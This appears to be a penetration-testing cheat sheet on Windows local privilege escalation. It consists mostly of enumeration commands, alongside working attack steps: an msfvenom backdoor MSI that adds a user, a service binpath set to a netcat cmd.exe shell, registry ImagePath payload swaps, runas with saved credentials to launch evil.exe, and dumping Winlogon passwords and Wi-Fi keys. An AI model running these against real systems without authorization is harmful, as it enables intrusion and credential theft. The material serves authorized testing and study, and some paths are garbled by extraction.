Overview Windows local privilege escalation (LPE) involves exploiting misconfigurations, weak permissions, vulnerable services, or stored credentials to elevate from a standard user to SYSTEM/Administrator. The best automated enumeration tool is WinPEAS .
This content is for authorized penetration testing only. Never test systems you do not have explicit written permission to assess.
OS Version and Patches
systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" wmic qfe get Caption,Description,HotFixID,InstalledOn wmic os get osarchitecture
PowerShell: [ System.Environment ]::OSVersion.Version Get-WmiObject - query 'select * from win32_quickfixengineering' | foreach { $_ .hotfixid } Get-Hotfix - description "Security update"
Environment Variables
set dir env: Get-ChildItem Env: | ft Key,Value -AutoSize
PowerShell History and Transcripts
type %userprofile% \A ppData \R oaming \M icrosoft \W indows \P owerShell \P SReadline \C onsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw # Check transcript registry keys reg query HKCU \S oftware \P olicies \M icrosoft \W indows \P owerShell \T ranscription reg query HKLM \S oftware \P olicies \M icrosoft \W indows \P owerShell \T ranscription
Drives and Shares
wmic logicaldisk get caption || fsutil fsinfo drives Get-PSDrive | where { $_ .Provider -like "Microsoft.PowerShell.Core\FileSystem"}
WSUS Exploitation If Windows Update uses HTTP instead of HTTPS:
reg query HKLM \S oftware \P olicies \M icrosoft \W indows \W indowsUpdate /v WUServer # or PowerShell: Get-ItemProperty -Path HKLM: \S oftware \P olicies \M icrosoft \W indows \W indowsUpdate -Name "WUServer"
If the value starts with http:// and UseWUServer=1, inject fake updates using Wsuxploit or pyWSUS .
AlwaysInstallElevated If both registry keys are set to 0x1, any user can install MSIs as SYSTEM:
reg query HKCU \S OFTWARE \P olicies \M icrosoft \W indows \I nstaller /v AlwaysInstallElevated reg query HKLM \S OFTWARE \P olicies \M icrosoft \W indows \I nstaller /v AlwaysInstallElevated
Exploit:
msfvenom -p windows/adduser USER=backdoor PASS=P@ssword123! -f msi -o alwe.msi msiexec /quiet /qn /i C: \U sers \P ublic \a lwe.msi
Service Exploitation
net start wmic service list brief sc query Get-Service
# Check service permissions with accesschk accesschk.exe -ucqv < Service_Nam e > accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula # Modify a service binary path if you have SERVICE_CHANGE_CONFIG sc config < Service_Nam e > binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config < Service_Nam e > binpath= "net localgroup administrators username /add"
Key permissions that allow binary path modification:
SERVICE_CHANGE_CONFIGWRITE_DACWRITE_OWNERGENERIC_WRITE / GENERIC_ALL
Windows resolves unquoted paths with spaces by trying each partial path: C:\Program Files\Some Folder\Service.exe → tries: C:\Program.exe → tries: C:\Program Files\Some.exe → tries: C:\Program Files\Some Folder\Service.exe
Find unquoted service paths: wmic service get name,pathname,displayname,startmode \ | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v '"' # PowerShell (PowerUp) Get-ServiceUnquoted -Verbose
Service Registry Permissions
reg query hklm \S ystem \C urrentControlSet \S ervices /s /v imagepath get-acl HKLM: \S ystem \C urrentControlSet \s ervices \* | Format-List * \ | findstr /i "<Username> Users Path Everyone"
If writable, change the binary path: reg add HKLM \S YSTEM \C urrentControlSet \s ervices \< sv c > /v ImagePath \ /t REG_EXPAND_SZ /d C: \p ath \t o \p ayload.exe /f
User and Group Enumeration # CMD net users %username% net users net localgroup net localgroup Administrators whoami /all # PowerShell Get-WmiObject -Class Win32_UserAccount Get-LocalUser | ft Name,Enabled,LastLogon Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Running Processes Analysis Tasklist /SVC tasklist /v /fi "username eq system" # Check for process binary write permissions Get-WmiObject -Query "Select * from Win32_Process" \ | where { $_ .Name -notlike "svchost*"} \ | Select Name, Handle, @{Label="Owner" ; Expression = {$_.GetOwner ().User}}
Check binary permissions of running processes:
for /f "tokens=2 delims='='" %%x in ( 'wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"' ) do ( for /f eol^=^ "^ delims^=^" %%z in ( 'echo %%x' ) do ( icacls "%%z" 2> nul | findstr /i "(F) (M) (W) : \\ " | findstr /i ": \\ everyone authenticated users todos %username%" ) )
Windows Credentials
Winlogon Auto-Login Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2> nul \ | findstr /i "DefaultDomainName DefaultUserName DefaultPassword"
cmdkey /list # Use saved credentials runas /savecred /user:WORKGROUP \A dministrator " \\ 10.x.x.x\SHARE\evil.exe"
Get-ChildItem C: \U sers \U SER \A ppData \R oaming \M icrosoft \P rotect \ Get-ChildItem C: \U sers \U SER \A ppData \L ocal \M icrosoft \P rotect \ # Decrypt with mimikatz # dpapi::masterkey /pvk or /rpc
netsh wlan show profile netsh wlan show profile < SSI D > key=clear
Unattended Installation Files
C:\Windows\Panther\Unattended.xml C:\Windows\Panther\Unattend.xml C:\Windows\System32\Sysprep\unattend.xml dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml 2>nul
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
# Interfaces ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address # Open ports netstat -ano # Shares net view net view /all /domain [domainname] net share # Routing route print # ARP arp -A
KrbRelayUp (Domain LPE) Requires: LDAP signing not enforced + users can configure RBCD + users can create computers (all default settings).
# https://github.com/Dec0ne/KrbRelayUp KrbRelayUp.exe relay -d < domai n > -cn < computernam e >
Antivirus / Security Controls Enumeration # Audit settings reg query HKLM \S oftware \M icrosoft \W indows \C urrentVersion \P olicies \S ystem \A udit # LAPS — local admin password management reg query "HKLM\Software\Policies\Microsoft\Services\AdmPwd" /v AdmPwdEnabled # WDigest — if enabled, cleartext passwords in LSASS reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential # LSA Protection reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL # Credential Guard reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags
PATH DLL Hijacking If you have write permissions inside a PATH folder:
for %%A in ( "%path:;=" ; "%" ) do ( cmd.exe /c icacls "%%~A" 2> nul \ | findstr /i "(F) (M) (W) : \\ " \ | findstr /i ": \\ everyone authenticated users todos %username%" )
References 
